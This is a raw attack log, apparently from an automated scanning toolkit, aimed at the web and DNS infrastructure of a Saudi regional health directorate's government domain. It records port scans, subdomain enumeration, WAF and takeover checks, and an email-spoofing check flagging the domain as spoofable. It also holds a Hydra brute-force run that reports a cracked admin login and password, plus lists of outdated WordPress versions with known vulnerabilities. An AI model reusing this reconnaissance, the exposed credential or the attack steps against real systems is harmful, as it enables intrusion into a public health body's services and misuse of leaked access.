  649. 10 219.58 ms 208.115.249.46
  650. 11 ... 30
  651. #######################################################################################################################################
  652.  
  653. ^ ^
  654. _ __ _ ____ _ __ _ _ ____
  655. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  656. | V V // o // _/ | V V // 0 // 0 // _/
  657. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  658. <
  659. ...'
  660.  
  661. WAFW00F - Web Application Firewall Detection Tool
  662.  
  663. By Sandro Gauci && Wendel G. Henrique
  664.  
  665. Checking http://192.169.84.216
  666. #######################################################################################################################################
  667.  
  668. wig - WebApp Information Gatherer
  669.  
  670.  
  671. Scanning http://192.169.84.216...
  672. ______________________ SITE INFO _______________________
  673. IP Title
  674. 192.169.84.216
  675.  
  676. _______________________ VERSION ________________________
  677. Name Versions Type
  678.  
  679. _____________________ INTERESTING ______________________
  680. URL Note Type
  681. /install.php Installation file Interesting
  682. /test.php Test file Interesting
  683.  
  684. ________________________________________________________
  685. Time: 2369.1 sec Urls: 600 Fingerprints: 40401
  686. #######################################################################################################################################
  687. HTTP/1.1 406 Not Acceptable
  688. Date: Mon, 19 Nov 2018 04:49:52 GMT
  689. Content-Type: text/html; charset=iso-8859-1
  690. Content-Length: 375
  691. X-XSS-Protection: 1; mode=block
  692. X-Content-Type-Options: nosniff
  693. Connection: keep-alive
  694. ######################################################################################################################################
  695. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-18 23:49 EST
  696. Nmap scan report for 192.169.84.216
  697. Host is up.
  698.  
  699. PORT STATE SERVICE VERSION
  700. 123/udp open|filtered ntp
  701. Too many fingerprints match this host to give specific OS details
  702.  
  703. TRACEROUTE (using proto 1/icmp)
  704. HOP RTT ADDRESS
  705. 1 106.49 ms 10.245.200.1
  706. 2 106.53 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
  707. 3 107.01 ms 10gigabitethernet-2-2.par2.he.net (195.42.144.104)
  708. 4 184.55 ms 100ge10-2.core1.ash1.he.net (184.105.213.173)
  709. 5 195.98 ms 184.105.213.69
  710. 6 219.54 ms 100ge12-1.core1.dal1.he.net (184.105.81.170)
  711. 7 219.93 ms 184.105.59.6
  712. 8 ...
  713. 9 219.58 ms 208.115.192.62
  714. 10 220.00 ms 208.115.249.46
  715. 11 ... 30
  716. #######################################################################################################################################
  717. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-18 23:52 EST
  718. Nmap scan report for 192.169.84.216
  719. Host is up (0.10s latency).
  720.  
  721. PORT STATE SERVICE VERSION
  722. 161/tcp filtered snmp
  723. 161/udp open|filtered snmp
  724. Too many fingerprints match this host to give specific OS details
  725.  
  726. TRACEROUTE (using proto 1/icmp)
  727. HOP RTT ADDRESS
  728. 1 110.07 ms 10.245.200.1
  729. 2 110.30 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
  730. 3 110.33 ms 10gigabitethernet-2-2.par2.he.net (195.42.144.104)
  731. 4 187.90 ms 100ge10-2.core1.ash1.he.net (184.105.213.173)
  732. 5 199.55 ms 184.105.213.69
  733. 6 226.12 ms 100ge12-1.core1.dal1.he.net (184.105.81.170)
  734. 7 227.93 ms 184.105.59.6
  735. 8 ...
  736. 9 227.34 ms 208.115.192.62
  737. 10 227.95 ms 208.115.249.46
  738. 11 ... 30
  739.  
  740. #######################################################################################################################################
  741.  
  742. I, [2018-11-18T23:55:40.766913 #14804] INFO -- : Initiating port scan
  743. I, [2018-11-18T23:57:21.959138 #14804] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-18_23-55-40.xml
  744. I, [2018-11-18T23:57:21.960064 #14804] INFO -- : Discovered open port: 192.169.84.216:80
  745. W, [2018-11-18T23:57:42.402653 #14804] WARN -- : Yasuo did not find any potential hosts to enumerate
  746. #######################################################################################################################################
  747. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-18 23:57 EST
  748. NSE: Loaded 148 scripts for scanning.
  749. NSE: Script Pre-scanning.
  750. Initiating NSE at 23:57
  751. Completed NSE at 23:57, 0.00s elapsed
  752. Initiating NSE at 23:57
  753. Completed NSE at 23:57, 0.00s elapsed
  754. Initiating Parallel DNS resolution of 1 host. at 23:57
  755. Completed Parallel DNS resolution of 1 host. at 23:57, 16.50s elapsed
  756. Initiating SYN Stealth Scan at 23:57
  757. Scanning 192.169.84.216 [474 ports]
  758. Discovered open port 80/tcp on 192.169.84.216
  759. Completed SYN Stealth Scan at 23:58, 5.36s elapsed (474 total ports)
  760. Initiating Service scan at 23:58
  761. Scanning 1 service on 192.169.84.216
  762. Completed Service scan at 23:58, 52.44s elapsed (1 service on 1 host)
  763. Initiating OS detection (try #1) against 192.169.84.216
  764. Retrying OS detection (try #2) against 192.169.84.216
  765. Initiating Traceroute at 23:59
  766. Completed Traceroute at 23:59, 0.12s elapsed
  767. Initiating Parallel DNS resolution of 2 hosts. at 23:59
  768. Completed Parallel DNS resolution of 2 hosts. at 23:59, 16.50s elapsed
  769. NSE: Script scanning 192.169.84.216.
  770. Initiating NSE at 23:59
  771. Completed NSE at 00:00, 73.97s elapsed
  772. Initiating NSE at 00:00
  773. Completed NSE at 00:00, 0.00s elapsed
  774. Nmap scan report for 192.169.84.216
  775. Host is up (0.11s latency).
  776. Not shown: 470 filtered ports
  777. PORT STATE SERVICE VERSION
  778. 25/tcp closed smtp
  779. 80/tcp open http-proxy Squid http proxy
  780. |_http-open-proxy: Proxy might be redirecting requests
  781. 139/tcp closed netbios-ssn
  782. 445/tcp closed microsoft-ds
  783. Device type: general purpose|storage-misc|broadband router|WAP
  784. Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (93%), HP embedded (90%), Asus embedded (87%)
  785. OS CPE: cpe:/o:linux:linux_kernel:3.18 cpe:/o:linux:linux_kernel:4 cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel cpe:/h:asus:rt-ac66u
  786. Aggressive OS guesses: Linux 3.18 (93%), Linux 3.16 - 4.6 (93%), Linux 3.10 - 4.11 (91%), Linux 3.13 (91%), Linux 3.13 or 4.2 (91%), Linux 4.2 (91%), Linux 4.4 (91%), HP P2000 G3 NAS device (90%), Linux 3.2 - 4.9 (90%), Linux 2.6.32 (89%)
  787. No exact OS matches for host (test conditions non-ideal).
  788. Uptime guess: 9.410 days (since Fri Nov 9 14:10:04 2018)
  789. Network Distance: 2 hops
  790. TCP Sequence Prediction: Difficulty=262 (Good luck!)
  791. IP ID Sequence Generation: All zeros
  792.  
  793. TRACEROUTE (using port 25/tcp)
  794. HOP RTT ADDRESS
  795. 1 110.95 ms 10.245.200.1
  796. 2 110.93 ms 192.169.84.216
  797.  
  798. NSE: Script Post-scanning.
  799. Initiating NSE at 00:00
  800. Completed NSE at 00:00, 0.00s elapsed
  801. Initiating NSE at 00:00
  802. Completed NSE at 00:00, 0.00s elapsed
  803. Read data files from: /usr/bin/../share/nmap
  804. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  805. Nmap done: 1 IP address (1 host up) scanned in 170.01 seconds
  806. Raw packets sent: 1034 (50.488KB) | Rcvd: 96 (5.942KB)
  807. #######################################################################################################################################
  808. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 00:00 EST
  809. NSE: Loaded 148 scripts for scanning.
  810. NSE: Script Pre-scanning.
  811. Initiating NSE at 00:00
  812. Completed NSE at 00:00, 0.00s elapsed
  813. Initiating NSE at 00:00
  814. Completed NSE at 00:00, 0.00s elapsed
  815. Initiating Parallel DNS resolution of 1 host. at 00:00
  816. Completed Parallel DNS resolution of 1 host. at 00:00, 16.50s elapsed
  817. Initiating UDP Scan at 00:00
  818. Scanning 192.169.84.216 [14 ports]
  819. Discovered open port 53/udp on 192.169.84.216
  820. Completed UDP Scan at 00:00, 2.10s elapsed (14 total ports)
  821. Initiating Service scan at 00:00
  822. Scanning 12 services on 192.169.84.216
  823. Service scan Timing: About 16.67% done; ETC: 00:10 (0:08:10 remaining)
  824. Completed Service scan at 00:02, 102.59s elapsed (12 services on 1 host)
  825. Initiating OS detection (try #1) against 192.169.84.216
  826. Retrying OS detection (try #2) against 192.169.84.216
  827. Initiating Traceroute at 00:02
  828. Completed Traceroute at 00:02, 7.15s elapsed
  829. Initiating Parallel DNS resolution of 1 host. at 00:02
  830. Completed Parallel DNS resolution of 1 host. at 00:03, 16.50s elapsed
  831. NSE: Script scanning 192.169.84.216.
  832. Initiating NSE at 00:03
  833. Completed NSE at 00:03, 20.31s elapsed
  834. Initiating NSE at 00:03
  835. Completed NSE at 00:03, 1.03s elapsed
  836. Nmap scan report for 192.169.84.216
  837. Host is up (0.12s latency).
  838.  
  839. PORT STATE SERVICE VERSION
  840. 53/udp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
  841. 67/udp open|filtered dhcps
  842. 68/udp open|filtered dhcpc
  843. 69/udp open|filtered tftp
  844. 88/udp open|filtered kerberos-sec
  845. 123/udp open|filtered ntp
  846. 137/udp filtered netbios-ns
  847. 138/udp filtered netbios-dgm
  848. 139/udp open|filtered netbios-ssn
  849. 161/udp open|filtered snmp
  850. 162/udp open|filtered snmptrap
  851. 389/udp open|filtered ldap
  852. 520/udp open|filtered route
  853. 2049/udp open|filtered nfs
  854. Too many fingerprints match this host to give specific OS details
  855. Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
  856.  
  857. TRACEROUTE (using port 137/udp)
  858. HOP RTT ADDRESS
  859. 1 105.02 ms 10.245.200.1
  860. 2 ... 3
  861. 4 106.07 ms 10.245.200.1
  862. 5 109.87 ms 10.245.200.1
  863. 6 109.88 ms 10.245.200.1
  864. 7 109.89 ms 10.245.200.1
  865. 8 109.89 ms 10.245.200.1
  866. 9 109.89 ms 10.245.200.1
  867. 10 109.77 ms 10.245.200.1
  868. 11 ... 18
  869. 19 106.14 ms 10.245.200.1
  870. 20 105.22 ms 10.245.200.1
  871. 21 ... 27
  872. 28 105.57 ms 10.245.200.1
  873. 29 ...
  874. 30 105.33 ms 10.245.200.1
  875.  
  876. NSE: Script Post-scanning.
  877. Initiating NSE at 00:03
  878. Completed NSE at 00:03, 0.00s elapsed
  879. Initiating NSE at 00:03
  880. Completed NSE at 00:03, 0.00s elapsed
  881. Read data files from: /usr/bin/../share/nmap
  882. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  883. Nmap done: 1 IP address (1 host up) scanned in 171.46 seconds
  884. Raw packets sent: 146 (13.574KB) | Rcvd: 27 (2.720KB)
  885. #######################################################################################################################################
  886. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 00:03 EST
  887. Nmap scan report for 192.169.84.216
  888. Host is up (0.11s latency).
  889. Not shown: 22 filtered ports, 3 closed ports
  890. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  891. PORT STATE SERVICE
  892. 80/tcp open http
  893. #######################################################################################################################################
  894. + -- --=[Port 21 closed... skipping.
  895. + -- --=[Port 22 closed... skipping.
  896. + -- --=[Port 23 closed... skipping.
  897. + -- --=[Port 25 closed... skipping.
  898. + -- --=[Port 80 opened... running tests...
  899. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  900.  
  901. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-19 00:03:43
  902. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  903. [DATA] attacking http-get://192.169.84.216:80//
  904. [STATUS] 2.00 tries/min, 2 tries in 00:01h, 1528 to do in 12:45h, 1 active
  905. [STATUS] 2.00 tries/min, 6 tries in 00:03h, 1524 to do in 12:43h, 1 active
  906. [STATUS] 1.86 tries/min, 13 tries in 00:07h, 1517 to do in 13:37h, 1 active
  907. [STATUS] 1.87 tries/min, 28 tries in 00:15h, 1502 to do in 13:25h, 1 active
  908. [80][http-get] host: 192.169.84.216 login: admin password: 696969
  909. [STATUS] attack finished for 192.169.84.216 (valid pair found)
  910. 1 of 1 target successfully completed, 1 valid password found
  911. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-19 00:20:01
  912. + -- --=[Port 110 closed... skipping.
  913. + -- --=[Port 139 closed... skipping.
  914. + -- --=[Port 162 closed... skipping.
  915. + -- --=[Port 389 closed... skipping.
  916. + -- --=[Port 443 closed... skipping.
  917. + -- --=[Port 445 closed... skipping.
  918. + -- --=[Port 512 closed... skipping.
  919. + -- --=[Port 513 closed... skipping.
  920. + -- --=[Port 514 closed... skipping.
  921. + -- --=[Port 993 closed... skipping.
  922. + -- --=[Port 1433 closed... skipping.
  923. + -- --=[Port 1521 closed... skipping.
  924. + -- --=[Port 3306 closed... skipping.
  925. + -- --=[Port 3389 closed... skipping.
  926. + -- --=[Port 5432 closed... skipping.
  927. + -- --=[Port 5900 closed... skipping.
  928. + -- --=[Port 5901 closed... skipping.
  929. + -- --=[Port 8000 closed... skipping.
  930. + -- --=[Port 8080 closed... skipping.
  931. + -- --=[Port 8100 closed... skipping.
  932. + -- --=[Port 6667 closed... skipping.
  933. #######################################################################################################################################
  934. dnsenum VERSION:1.2.4
  935.  
  936. ----- qh.gov.sa -----
  937.  
  938.  
  939. Host's addresses:
  940. __________________
  941.  
  942. qh.gov.sa. 299 IN A 192.169.84.216
  943.  
  944.  
  945. Name Servers:
  946. ______________
  947.  
  948. dion.ns.cloudflare.com. 86396 IN A 173.245.59.156
  949. vita.ns.cloudflare.com. 86312 IN A 173.245.58.238
  950.  
  951.  
  952. Mail (MX) Servers:
  953. ___________________
  954.  
  955. qh-gov-sa.mail.protection.outlook.com. 10 IN A 94.245.120.74
  956. qh-gov-sa.mail.protection.outlook.com. 10 IN A 213.199.154.138
  957.  
  958.  
  959. Trying Zone Transfers and getting Bind Versions:
  960. _________________________________________________
  961.  
  962.  
  963. Trying Zone Transfer for qh.gov.sa on dion.ns.cloudflare.com ...
  964.  
  965. Trying Zone Transfer for qh.gov.sa on vita.ns.cloudflare.com ...
  966.  
  967. brute force file not specified, bay.
  968. #######################################################################################################################################
  969. % SaudiNIC Whois server.
  970. % Rights restricted by copyright.
  971. % http://nic.sa/en/view/whois-cmd-copyright
  972.  
  973. Domain Name: qh.gov.sa
  974.  
  975. Registrant:
  976. MOH-The Directorate for Health Affairs in Qassim Region وزارة الصحة - المديرية العامة للشؤون الصحية بالقصيم
  977. Address: لا يوجد
  978. Buraidah
  979. Saudi Arabia المملكة العربية السعودية
  980.  
  981. Administrative Contact:
  982. Sultan Abdulaziz AlGhaniam سلطان عبدالعزيز الغنيم
  983. Address: King Khalid Road طريق الملك خالد
  984. 51491 Buraidah
  985. Saudi Arabia
  986.  
  987. Technical Contact:
  988. Sultan Abdulaziz AlGhaniam سلطان عبدالعزيز الغنيم
  989. Address: King Khalid Road طريق الملك خالد
  990. 51491 Buraidah
  991. المملكة العربية السعودية
  992.  
  993. Name Servers:
  994. vita.ns.cloudflare.com
  995. dion.ns.cloudflare.com
  996.  
  997. Created on: 2010-01-19
  998. Last Updated on: 2018-11-04
  999. #######################################################################################################################################
  1000.  
  1001. [-] Enumerating subdomains now for qh.gov.sa
  1002. [-] verbosity is enabled, will show the subdomains results in realtime
  1003. [-] Searching now in Baidu..
  1004. [-] Searching now in Yahoo..
  1005. [-] Searching now in Google..
  1006. [-] Searching now in Bing..
  1007. [-] Searching now in Ask..
  1008. [-] Searching now in Netcraft..
  1009. [-] Searching now in DNSdumpster..
  1010. [-] Searching now in Virustotal..
  1011. [-] Searching now in ThreatCrowd..
  1012. [-] Searching now in SSL Certificates..
  1013. [-] Searching now in PassiveDNS..
  1014. Virustotal: test.qh.gov.sa
  1015. Virustotal: mail.qh.gov.sa
  1016. Virustotal: jobs.qh.gov.sa
  1017. Virustotal: www.qh.gov.sa
  1018. ThreatCrowd: www.qh.gov.sa
  1019. Bing: jobs.qh.gov.sa
  1020. Bing: mail.qh.gov.sa
  1021. SSL Certificates: test.qh.gov.sa
  1022. SSL Certificates: www.test.qh.gov.sa
  1023. SSL Certificates: mail.qh.gov.sa
  1024. SSL Certificates: www.qh.gov.sa
  1025. DNSdumpster: www.test.qh.gov.sa
  1026. DNSdumpster: test.qh.gov.sa
  1027. DNSdumpster: jobs.qh.gov.sa
  1028. [-] Saving results to file: /usr/share/sniper/loot/qh.gov.sa/domains/domains-qh.gov.sa.txt
  1029. [-] Total Unique Subdomains Found: 5
  1030. www.qh.gov.sa
  1031. jobs.qh.gov.sa
  1032. mail.qh.gov.sa
  1033. test.qh.gov.sa
  1034. www.test.qh.gov.sa
  1035. #######################################################################################################################################
  1036. qh.gov.sa,192.169.84.216
  1037. mail.qh.gov.sa,192.169.84.216
  1038. www.qh.gov.sa,192.169.84.216
  1039. www.test.qh.gov.sa,192.169.84.216
  1040. test.qh.gov.sa,192.169.84.216
  1041. jobs.qh.gov.sa,143.95.251.88
  1042. ftp.qh.gov.sa,192.169.84.216
  1043. ns1.qh.gov.sa,192.169.84.216
  1044. ns2.qh.gov.sa,192.169.84.216
  1045. #######################################################################################################################################
  1046.  
  1047.  
  1048. Running Source: Ask
  1049. Running Source: Archive.is
  1050. Running Source: Baidu
  1051. Running Source: Bing
  1052. Running Source: CertDB
  1053. Running Source: CertificateTransparency
  1054. Running Source: Certspotter
  1055. Running Source: Commoncrawl
  1056. Running Source: Crt.sh
  1057. Running Source: Dnsdb
  1058. Running Source: DNSDumpster
  1059. Running Source: DNSTable
  1060. Running Source: Dogpile
  1061. Running Source: Exalead
  1062. Running Source: Findsubdomains
  1063. Running Source: Googleter
  1064. Running Source: Hackertarget
  1065. Running Source: Ipv4Info
  1066. Running Source: PTRArchive
  1067. Running Source: Sitedossier
  1068. Running Source: Threatcrowd
  1069. Running Source: ThreatMiner
  1070. Running Source: WaybackArchive
  1071. Running Source: Yahoo
  1072.  
  1073. Running enumeration on qh.gov.sa
  1074.  
  1075. dnsdb: Unexpected return status 503
  1076.  
  1077. waybackarchive: Get https://web.archive.org/cdx/search/cdx?url=*.qh.gov.sa/*&output=json&fl=original&collapse=urlkey&page=: net/http: invalid header field value "http://web.archive.org/cdx/search/cdx?url=*.qh.gov.sa/*&output=json&fl=original&collapse=urlkey&page=\x00" for key Referer
  1078.  
  1079.  
  1080. Starting Bruteforcing of qh.gov.sa with 9985 words
  1081.  
  1082. Total 18 Unique subdomains found for qh.gov.sa
  1083.  
  1084. .qh.gov.sa
  1085. autodiscover.qh.gov.sa
  1086. ftp.qh.gov.sa
  1087. jobs.qh.gov.sa
  1088. jobs.qh.gov.sa
  1089. localhost.qh.gov.sa
  1090. lyncdiscover.qh.gov.sa
  1091. mail.qh.gov.sa
  1092. mail.qh.gov.sa
  1093. msoid.qh.gov.sa
  1094. ns1.qh.gov.sa
  1095. ns2.qh.gov.sa
  1096. sip.qh.gov.sa
  1097. test.qh.gov.sa
  1098. test.qh.gov.sa
  1099. www.qh.gov.sa
  1100. www.qh.gov.sa
  1101. www.test.qh.gov.sa
  1102. #######################################################################################################################################
  1103. [*] Processing domain qh.gov.sa
  1104. [+] Getting nameservers
  1105. 173.245.58.238 - vita.ns.cloudflare.com
  1106. 173.245.59.156 - dion.ns.cloudflare.com
  1107. [-] Zone transfer failed
  1108.  
  1109. [+] TXT records found
  1110. "v=spf1include:spf.protection.outlook.com-all"
  1111.  
  1112. [+] MX records found, added to target list
  1113. 0 qh-gov-sa.mail.protection.outlook.com.
  1114.  
  1115. [*] Scanning qh.gov.sa for A records
  1116. 192.169.84.216 - qh.gov.sa
  1117. 192.169.84.216 - mail.qh.gov.sa
  1118. 192.169.84.216 - www.qh.gov.sa
  1119. 192.169.84.216 - ftp.qh.gov.sa
  1120. 127.0.0.1 - localhost.qh.gov.sa
  1121. 192.169.84.216 - ns1.qh.gov.sa
  1122. 192.169.84.216 - ns2.qh.gov.sa
  1123. 40.100.174.232 - autodiscover.qh.gov.sa
  1124. 52.97.146.200 - autodiscover.qh.gov.sa
  1125. 52.97.146.152 - autodiscover.qh.gov.sa
  1126. 40.100.174.200 - autodiscover.qh.gov.sa
  1127. 192.169.84.216 - test.qh.gov.sa
  1128. 52.112.194.11 - sip.qh.gov.sa
  1129. 52.112.194.14 - lyncdiscover.qh.gov.sa
  1130. 143.95.251.88 - jobs.qh.gov.sa
  1131. 40.126.1.166 - msoid.qh.gov.sa
  1132. 40.126.1.162 - msoid.qh.gov.sa
  1133. 40.126.1.164 - msoid.qh.gov.sa
  1134. 40.126.1.130 - msoid.qh.gov.sa
  1135. 40.126.1.128 - msoid.qh.gov.sa
  1136.  
  1137. #######################################################################################################################################
  1138.  
  1139. mail.qh.gov.sa
  1140. *.qh.gov.sa
  1141. test.qh.gov.sa
  1142. www.qh.gov.sa
  1143. www.test.qh.gov.sa
  1144.  
  1145. [+] Domains saved to: /usr/share/sniper/loot/qh.gov.sa/domains/domains-qh.gov.sa-full.txt
  1146. #######################################################################################################################################
  1147. [*] Found SPF record:
  1148. [*] v=spf1include:spf.protection.outlook.com-all
  1149. [+] SPF record has no All string
  1150. [*] Checking SPF include mechanisms
  1151. [*] Include mechanisms are not strong
  1152. [*] Processing an SPF include domain: spf.protection.outlook.com-all
  1153. [+] spf.protection.outlook.com-all has no SPF record!
  1154. [*] No DMARC record found. Looking for organizational record
  1155. [+] No organizational DMARC record
  1156. [+] Spoofing possible for qh.gov.sa!
  1157. #######################################################################################################################################
  1158. ____ _____ ___ ______ _/ /_____ ____ ___
  1159. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  1160. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  1161. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  1162. /_/ discover v0.5.0 - by @michenriksen
  1163.  
  1164. Identifying nameservers for qh.gov.sa... Done
  1165. Using nameservers:
  1166.  
  1167. - 173.245.58.238
  1168. - 173.245.59.156
  1169.  
  1170. Checking for wildcard DNS... Done
  1171.  
  1172. Running collector: Threat Crowd... Done (1 host)
  1173. Running collector: DNSDB... Error
  1174. -> DNSDB returned unexpected response code: 503
  1175. Running collector: Netcraft... Done (0 hosts)
  1176. Running collector: PublicWWW... Done (0 hosts)
  1177. Running collector: Censys... Skipped
  1178. -> Key 'censys_secret' has not been set
  1179. Running collector: Wayback Machine... Done (4 hosts)
  1180. Running collector: PTRArchive... Error
  1181. -> PTRArchive returned unexpected response code: 502
  1182. Running collector: PassiveTotal... Skipped
  1183. -> Key 'passivetotal_key' has not been set
  1184. Running collector: Shodan... Skipped
  1185. -> Key 'shodan' has not been set
  1186. Running collector: Riddler... Skipped
  1187. -> Key 'riddler_username' has not been set
  1188. Running collector: VirusTotal... Skipped
  1189. -> Key 'virustotal' has not been set
  1190. Running collector: Dictionary... Done (0 hosts)
  1191. Running collector: HackerTarget... Done (3 hosts)
  1192. Running collector: Google Transparency Report... Done (1 host)
  1193. Running collector: Certificate Search... Done (5 hosts)
  1194.  
  1195. Resolving 6 unique hosts...
  1196. 143.95.251.88 jobs.qh.gov.sa
  1197. 192.169.84.216 mail.qh.gov.sa
  1198. 192.169.84.216 qh.gov.sa
  1199. 192.169.84.216 test.qh.gov.sa
  1200. 192.169.84.216 www.qh.gov.sa
  1201. 192.169.84.216 www.test.qh.gov.sa
  1202.  
  1203. Found subnets:
  1204.  
  1205. - 192.169.84.0-255 : 5 hosts
  1206.  
  1207. Wrote 6 hosts to:
  1208.  
  1209. - file:///root/aquatone/qh.gov.sa/hosts.txt
  1210. - file:///root/aquatone/qh.gov.sa/hosts.json
  1211. __
  1212. ____ _____ ___ ______ _/ /_____ ____ ___
  1213. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  1214. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  1215. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  1216. /_/ takeover v0.5.0 - by @michenriksen
  1217.  
  1218. Loaded 6 hosts from /root/aquatone/qh.gov.sa/hosts.json
  1219. Loaded 25 domain takeover detectors
  1220.  
  1221. Identifying nameservers for qh.gov.sa... Done
  1222. Using nameservers:
  1223.  
  1224. - 173.245.58.238
  1225. - 173.245.59.156
  1226.  
  1227. Checking hosts for domain takeover vulnerabilities...
  1228.  
  1229. Finished checking hosts:
  1230.  
  1231. - Vulnerable : 0
  1232. - Not Vulnerable : 6
  1233.  
  1234. Wrote 0 potential subdomain takeovers to:
  1235.  
  1236. - file:///root/aquatone/qh.gov.sa/takeovers.json
  1237.  
  1238. __
  1239. ____ _____ ___ ______ _/ /_____ ____ ___
  1240. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  1241. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  1242. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  1243. /_/ scan v0.5.0 - by @michenriksen
  1244.  
  1245. Loaded 6 hosts from /root/aquatone/qh.gov.sa/hosts.json
  1246.  
  1247. Probing 4 ports...
  1248. 80/tcp 143.95.251.88 jobs.qh.gov.sa
  1249. 80/tcp 192.169.84.216 qh.gov.sa, test.qh.gov.sa, www.test.qh.gov.sa and 2 more
  1250. 443/tcp 143.95.251.88 jobs.qh.gov.sa
  1251.  
  1252. Wrote open ports to file:///root/aquatone/qh.gov.sa/open_ports.txt
  1253. Wrote URLs to file:///root/aquatone/qh.gov.sa/urls.txt
  1254. __
  1255. ____ _____ ___ ______ _/ /_____ ____ ___
  1256. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  1257. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  1258. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  1259. /_/ gather v0.5.0 - by @michenriksen
  1260.  
  1261. Processing 7 pages...
  1262.  
  1263. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
  1264.  
  1265. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
  1266.  
  1267. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
  1268. #######################################################################################################################################
  1269. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-18 23:14 EST
  1270. Nmap scan report for qh.gov.sa (192.169.84.216)
  1271. Host is up (0.11s latency).
  1272. Not shown: 472 filtered ports, 3 closed ports
  1273. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  1274. PORT STATE SERVICE
  1275. 80/tcp open http
  1276. #######################################################################################################################################
  1277. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-18 23:14 EST
  1278. Nmap scan report for qh.gov.sa (192.169.84.216)
  1279. Host is up (0.11s latency).
  1280. Not shown: 2 filtered ports
  1281. PORT STATE SERVICE
  1282. 53/udp open|filtered domain
  1283. 67/udp open|filtered dhcps
  1284. 68/udp open|filtered dhcpc
  1285. 69/udp open|filtered tftp
  1286. 88/udp open|filtered kerberos-sec
  1287. 123/udp open|filtered ntp
  1288. 139/udp open|filtered netbios-ssn
  1289. 161/udp open|filtered snmp
  1290. 162/udp open|filtered snmptrap
  1291. 389/udp open|filtered ldap
  1292. 520/udp open|filtered route
  1293. 2049/udp open|filtered nfs
  1294. #######################################################################################################################################
  1295.  
  1296. ^ ^
  1297. _ __ _ ____ _ __ _ _ ____
  1298. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1299. | V V // o // _/ | V V // 0 // 0 // _/
  1300. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1301. <
  1302. ...'
  1303.  
  1304. WAFW00F - Web Application Firewall Detection Tool
  1305.  
  1306. By Sandro Gauci && Wendel G. Henrique
  1307.  
  1308. Checking http://qh.gov.sa
  1309. #######################################################################################################################################
  1310.  
  1311. wig - WebApp Information Gatherer
  1312.  
  1313.  
  1314. Scanning http://qh.gov.sa...
  1315. ____________________________________________________ SITE INFO ____________________________________________________
  1316. IP Title
  1317. 192.169.84.216
  1318.  
  1319. _____________________________________________________ VERSION _____________________________________________________
  1320. Name Versions Type
  1321. WordPress 3.8 | 3.8.1 | 3.8.2 | 3.8.3 | 3.8.4 | 3.8.5 | 3.8.6 | 3.8.7 CMS
  1322. 3.8.8 | 3.9 | 3.9.1 | 3.9.2 | 3.9.3 | 3.9.4 | 3.9.5 | 3.9.6
  1323. 4.0 | 4.0.1 | 4.0.2 | 4.0.3 | 4.0.4 | 4.0.5 | 4.1 | 4.1.1
  1324. 4.1.2 | 4.1.3 | 4.1.4 | 4.1.5 | 4.2 | 4.2.1 | 4.2.2
  1325.  
  1326. ___________________________________________________ INTERESTING ___________________________________________________
  1327. URL Note Type
  1328. /install.php Installation file Interesting
  1329. /test.php Test file Interesting
  1330.  
  1331. ______________________________________________________ TOOLS ______________________________________________________
  1332. Name Link Software
  1333. wpscan https://github.com/wpscanteam/wpscan WordPress
  1334. CMSmap https://github.com/Dionach/CMSmap WordPress
  1335.  
  1336. _________________________________________________ VULNERABILITIES _________________________________________________
  1337. Affected #Vulns Link
  1338. WordPress 3.8 12 http://cvedetails.com/version/162922
  1339. WordPress 3.8.1 12 http://cvedetails.com/version/162923
  1340. WordPress 3.8.2 7 http://cvedetails.com/version/176067
  1341. WordPress 3.8.3 7 http://cvedetails.com/version/176068
  1342. WordPress 3.8.4 8 http://cvedetails.com/version/176069
  1343. WordPress 3.9 8 http://cvedetails.com/version/176070
  1344. WordPress 3.9.1 15 http://cvedetails.com/version/169908
  1345. WordPress 3.9.2 10 http://cvedetails.com/version/176071
  1346. WordPress 3.9.3 1 http://cvedetails.com/version/185080
  1347. WordPress 4.0 9 http://cvedetails.com/version/176072
  1348. WordPress 4.0.1 1 http://cvedetails.com/version/185081
  1349. WordPress 4.1 1 http://cvedetails.com/version/185082
